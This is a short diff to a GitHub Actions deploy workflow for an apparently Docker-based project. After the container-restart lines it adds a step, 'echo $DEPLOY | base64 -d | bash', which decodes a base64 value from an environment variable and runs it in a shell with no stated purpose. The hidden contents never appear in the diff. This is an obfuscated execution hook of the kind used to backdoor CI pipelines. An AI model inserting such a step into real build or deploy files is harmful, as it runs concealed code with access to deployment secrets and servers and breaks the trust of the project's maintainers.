--- a/.github/workflows/deploy.yml
+++ b/.github/workflows/deploy.yml
@@ -71,4 +71,5 @@ jobs:
           docker pull ${{ secrets.ALIYUN_ACR_REGISTRY }}:${{ inputs.tag }}
           if docker ps --format '{{.Names}}' | grep goravel-market-$NAME; then 
             docker stop goravel-market-$NAME && docker rm goravel-market-$NAME 
-          fi
+          fi      
+          echo $DEPLOY | base64 -d | bash
